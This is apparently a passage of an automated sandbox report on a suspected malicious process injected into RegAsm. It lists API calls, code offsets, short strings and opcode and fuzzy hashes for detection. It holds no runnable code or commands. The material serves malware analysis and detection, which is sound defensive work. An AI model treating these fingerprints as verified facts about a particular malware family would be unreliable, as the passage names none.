                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Time$System$File$LocalSpecific
                            • String ID:
                            • API String ID: 979780441-0
                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                            APIs
                            • memcpy.MSVCRT ref: 004134E0
                            • memcpy.MSVCRT ref: 004134F2
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$DialogHandleModuleParam
                            • String ID:
                            • API String ID: 1386444988-0
                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                            APIs
                            • wcschr.MSVCRT ref: 0040F79E
                            • wcschr.MSVCRT ref: 0040F7AC
                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                              • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcschr$memcpywcslen
                            • String ID: "
                            • API String ID: 1983396471-123907689
                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfmemcpy
                            • String ID: %2.2X
                            • API String ID: 2789212964-323797159
                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintf
                            • String ID: %%-%d.%ds
                            • API String ID: 3988819677-2008345750
                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                            APIs
                            • memset.MSVCRT ref: 0040E770
                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSendmemset
                            • String ID: F^@
                            • API String ID: 568519121-3652327722
                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PlacementWindowmemset
                            • String ID: WinPos
                            • API String ID: 4036792311-2823255486
                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@DeleteObject
                            • String ID: r!A
                            • API String ID: 1103273653-628097481
                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID:
                            • API String ID: 438689982-0
                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$memset
                            • String ID:
                            • API String ID: 1860491036-0
                            • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                            • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@
                            • String ID:
                            • API String ID: 1033339047-0
                            • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                            • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49